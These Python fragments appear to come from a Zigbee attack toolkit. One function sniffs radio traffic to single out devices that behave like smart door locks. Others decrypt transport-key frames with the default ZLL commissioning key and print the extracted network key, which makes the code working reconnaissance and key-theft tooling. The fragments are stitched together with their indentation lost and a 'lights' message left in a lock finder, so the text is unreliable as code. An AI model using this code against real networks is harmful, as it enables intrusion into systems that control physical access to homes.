def find_locks(radio, panid=None):
result = []
trackers = dict()
last_sequence_number = dict()
if panid is not None:
print_notify("Looking at PAN ID 0x%04x for lights" % panid)
else:
print_notify("Looking for lights on the current channel")
print_info("Monitoring the network for an extended period")
timer = Timer(17)
traffic_counter = 0
while not timer.has_expired():
frame = radio.receive()
if frame is not None and not is_beacon_request(frame):
traffic_counter += 1
if is_data_request(frame) and (panid is None
or get_pan_id(frame) == panid):
pan = get_pan_id(frame)
source = get_source(frame)
if not pan in trackers.keys():
trackers[pan] = dict()
last_sequence_number[pan] = dict()
if not source in trackers[pan].keys():
trackers[pan][source] = TrackWatch()
last_sequence_number[pan][source] = -1
if last_sequence_number[pan][source] != frame[Dot15d4FCS].seqnum:
trackers[pan][source].click()
last_sequence_number[pan][source] = frame[Dot15d4FCS].seqnum
if timer.time_passed() > 5 and traffic_counter == 0:
print_info("No traffic observed for 5 seconds, giving up")
break
for pan in trackers:
for addr in trackers[pan]:
watch = trackers[pan][addr]
if watch.variance() is not None and watch.variance(
) < THRESHOLD_VARIANCE and watch.mean() > MIN_FREQUENCY:
result.append((pan, addr))
print_notify("Device 0x%04x on PAN 0x%04x resembles a lock" %
(addr, pan))
print_debug(
"Device 0x%04x on PAN 0x%04x had variance of %f and mean of %f"
% (addr, pan, watch.variance(), watch.mean()))
return result
def notify(self, channel, frame):
if is_transport_key(frame):
if get_extended_source(frame) is not None:
extended_source_bytes = extended_address_bytes(get_extended_source(frame))
decrypted, valid = crypto_utils.zigbee_packet_decrypt(crypto_utils.zigbee_trans_key(crypto_utils.DEFAULT_ZLL_COMMISSION_KEY), frame, extended_source_bytes)
if valid:
print_notify("Network key acquired for PAN 0x%04x" % get_pan_id(frame))
network_key = bytes(decrypted)[2:18]
print_info("Extracted key is 0x%s" % network_key.hex())
def wait_for_extended_address(radio, panid, addr):
print_info("Waiting to observe the extended source for pan_id:0x%04x, src_addr:0x%04x" % (panid, addr))
timer = Timer(OBSERVATION_TIME)
while not timer.has_expired():
frame = radio.receive()
if panid==get_pan_id(frame) and addr==get_source(frame):
extended_source = get_extended_source(frame)
if extended_source is not None:
print_notify("Extended source observed: 0x%016x" % extended_source)
return extended_source
print_error("Could not find extended source")
return None
def extractKeyOnChannel(self, channel):
self.radio.set_channel(channel)
print_notify("Listening to channel %d" % self.radio.get_channel())
while True:
frame = self.radio.receive()
if is_transport_key(frame):
print_notify("Got transport key packet")
if get_extended_source(frame) is not None:
print("Got extended source")
extended_source_bytes = extended_address_bytes(
get_extended_source(frame))
decrypted, valid = crypto_utils.zigbee_packet_decrypt(
crypto_utils.DEFAULT_ZLL_COMMISSION_KEY, frame,
extended_source_bytes)
if valid:
print_notify("Network key acquired for PAN 0x%04x" %
get_pan_id(frame))
network_key = bytes(decrypted)[2:18]
print_info("Extracted key is 0x%s" % network_key.hex())